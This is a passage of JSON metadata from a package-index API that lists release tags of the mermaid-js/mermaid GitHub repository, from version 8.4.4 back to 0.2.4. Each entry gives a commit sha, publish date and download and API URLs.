e.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f43366252632a1a42020/manifests"},{"name":"8.4.4","sha":"0544dbe89196f2709ad714432ed4f6c9883fa023","kind":"commit","published_at":"2019-12-14T08:27:38.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.4/manifests"},{"name":"8.4.3","sha":"cb07a729e5e11d58ee1bce43dc041b76a610bde2","kind":"commit","published_at":"2019-11-30T23:42:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.3/manifests"},{"name":"8.4.2","sha":"1ecf0f4c234a773c735dc56804233a66377db3b3","kind":"commit","published_at":"2019-11-07T20:16:43.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.2/manifests"},{"name":"8.4.1","sha":"a3017b8456cfafb446aedb9ad549328a69e24984","kind":"commit","published_at":"2019-11-06T18:52:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.1/manifests"},{"name":"8.4.0","sha":"0157f665a305b0616e7932360a2f9fb2fa154668","kind":"commit","published_at":"2019-10-19T14:59:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.0/manifests"},{"name":"8.3.0","sha":"0200fef389e3b0988557028d6edd03262ceeefba","kind":"commit","published_at":"2019-09-19T05:19:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.3.0/manifests"},{"name":"8.2.6","sha":"2cb54293f80af8c07bee8b91cfb04388e786fb83","kind":"commit","published_at":"2019-09-01T09:18:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.6/manifests"},{"name":"8.2.5","sha":"34d3b852271ea3b7ebf58553334ad3d5645c15f1","kind":"commit","published_at":"2019-08-26T18:23:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.5/manifests"},{"name":"8.2.4","sha":"a3142aad69167bc6b690e5a77550a869c86d79cd","kind":"commit","published_at":"2019-08-20T18:07:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.4/manifests"},{"name":"8.2.3","sha":"5b85fe9293493bc68d105cf78192ac475c9c6d0e","kind":"commit","published_at":"2019-07-25T19:00:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.3/manifests"},{"name":"8.2.2","sha":"cf686c445c069bd3137560f2ab3a30bfb7bc9dc5","kind":"commit","published_at":"2019-07-22T12:23:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.2/manifests"},{"name":"8.2.1","sha":"5dd392127f1121dea2a05fb0a535101c085496b2","kind":"commit","published_at":"2019-07-21T09:23:23.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.1/manifests"},{"name":"8.2.0","sha":"92ac7d7c2477071a7279927b023872d866571e28","kind":"commit","published_at":"2019-07-17T16:14:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.0/manifests"},{"name":"8.1.0","sha":"95967151ae61be7db104564dbf29db81a4415f11","kind":"commit","published_at":"2019-06-25T08:24:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.1.0/manifests"},{"name":"7.0.5","sha":"f6b5c704e8939db0047e7a70ab3b6109af261fb0","kind":"commit","published_at":"2017-09-01T10:34:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.5/manifests"},{"name":"7.0.3","sha":"1076d671374898a1e75b778911832da01f57b88f","kind":"commit","published_at":"2017-06-04T04:13:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.3/manifests"},{"name":"7.0.2","sha":"5f5c8a2df00d93d2a9ed48fa868d1a4ded761457","kind":"commit","published_at":"2017-06-01T05:38:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.2/manifests"},{"name":"7.0.0","sha":"fb70b9742a22f8673cdd3a8d74fcbbc6ea03b432","kind":"commit","published_at":"2017-01-29T11:14:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.0/manifests"},{"name":"6.0.0","sha":"b8d3b01f64f30fa1dd46f7de160e8f80147010f3","kind":"commit","published_at":"2016-05-29T17:25:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/6.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/6.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@6.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/6.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/6.0.0/manifests"},{"name":"0.5.8","sha":"6ee298dc7d5913ea065b92e736184edcc05b6c74","kind":"commit","published_at":"2016-01-27T14:02:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.8/manifests"},{"name":"0.5.7","sha":"f005c72669c0e41bac6f42f81a6805a923dacbf0","kind":"commit","published_at":"2016-01-25T17:59:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.7/manifests"},{"name":"0.5.6","sha":"425a83c0da996ba565c2b840993fbf61a725a84a","kind":"commit","published_at":"2015-11-22T17:55:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.6/manifests"},{"name":"0.5.5","sha":"c9d29c16e20783700701a340540959ed5680236c","kind":"commit","published_at":"2015-10-21T19:14:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.5/manifests"},{"name":"0.5.4","sha":"ecb12ae2a8bc7f8c7077737713cf94acffac5c41","kind":"commit","published_at":"2015-10-19T20:08:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.4/manifests"},{"name":"0.5.3","sha":"16906ee242fcaf51d77f082fc3e7167241432ab0","kind":"commit","published_at":"2015-10-04T21:28:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.3/manifests"},{"name":"0.5.2","sha":"a611ff3abd70103fc9ac44af63103e9f9d5991c9","kind":"commit","published_at":"2015-10-04T21:09:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.2/manifests"},{"name":"0.5.1","sha":"0dc983d04ab9400e604a460eea3a409570961ab2","kind":"commit","published_at":"2015-06-21T15:26:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.1/manifests"},{"name":"0.5.0","sha":"999430f9e0c18ca830f497817c8701cfbd2046f9","kind":"commit","published_at":"2015-06-07T15:05:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.0/manifests"},{"name":"0.4.0","sha":"cc1a4be15a5ed3726a121a5fce75a561ddca5e1d","kind":"commit","published_at":"2015-03-01T15:48:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.4.0/manifests"},{"name":"0.3.5","sha":"2512666f493e8455f6534f216d42f00a7c9e526f","kind":"commit","published_at":"2015-02-15T18:34:18.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.5/manifests"},{"name":"0.3.4","sha":"074a819ca8d3d98cdef3144d091a63f919d3a55d","kind":"commit","published_at":"2015-02-15T17:11:46.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.4/manifests"},{"name":"0.3.3","sha":"5452be9feda681abb48d6364fbca662c6af0215d","kind":"commit","published_at":"2015-01-25T15:41:43.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.3/manifests"},{"name":"0.3.2","sha":"911cd09dd875deb50f65a98baf21f65ab2cbf82b","kind":"commit","published_at":"2015-01-11T14:02:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.2/manifests"},{"name":"0.3.1","sha":"222a6e06827f194d9368d3a790dbe6cc53341788","kind":"commit","published_at":"2015-01-05T14:32:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.1/manifests"},{"name":"0.3.0","sha":"c50178c640a4f6c99539bcc64cf029e94263fdb4","kind":"commit","published_at":"2014-12-22T12:52:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.0/manifests"},{"name":"0.2.16","sha":"5712c6de7bdca29a2950df1e6e0342ca8f0323a4","kind":"commit","published_at":"2014-12-15T18:35:09.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.16","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.16/manifests"},{"name":"0.2.15","sha":"6988dea3535919faa599537c31c5d94a01a30479","kind":"commit","published_at":"2014-12-05T09:50:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.15","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.15/manifests"},{"name":"0.2.14","sha":"dd26960852b4cba1d60e6bb2e508c0af6dd3d4b4","kind":"commit","published_at":"2014-12-03T18:35:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.14","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.14/manifests"},{"name":"0.2.13","sha":"fe2f3b403d1310c2a6e09aac24d0fdd257c2ddcf","kind":"commit","published_at":"2014-12-03T18:29:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.13","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.13/manifests"},{"name":"0.2.10","sha":"15023461722117d1429bbc0eb6030ca35aa51d53","kind":"commit","published_at":"2014-12-01T20:12:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.10","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.10/manifests"},{"name":"0.2.9","sha":"1a7997cdef01882ea7b46948d58625e904a09094","kind":"tag","published_at":"2014-12-01T20:04:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.9/manifests"},{"name":"0.2.8","sha":"1d2327c4c2ae60692f9bfe8b4d19ea195ebcbb04","kind":"tag","published_at":"2014-12-01T09:01:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.8/manifests"},{"name":"0.2.7","sha":"cbd41dbb1b4875aa3254babca694844908a1ecf7","kind":"tag","published_at":"2014-12-01T08:30:27.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.7/manifests"},{"name":"0.2.6","sha":"9a35844731426e1f74f64d272ae6398f20424457","kind":"commit","published_at":"2014-11-27T20:28:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.6/manifests"},{"name":"0.2.5","sha":"18be0e02aa80dcad171b26d2e397750100dc7d23","kind":"commit","published_at":"2014-11-27T20:16:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.5/manifests"},{"name":"0.2.4","sha":"9c31ac8aa68bff142e33b63b5ca3217aa8db7f5a","kind":"commit","published_at":"2014-11-25T21:58:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0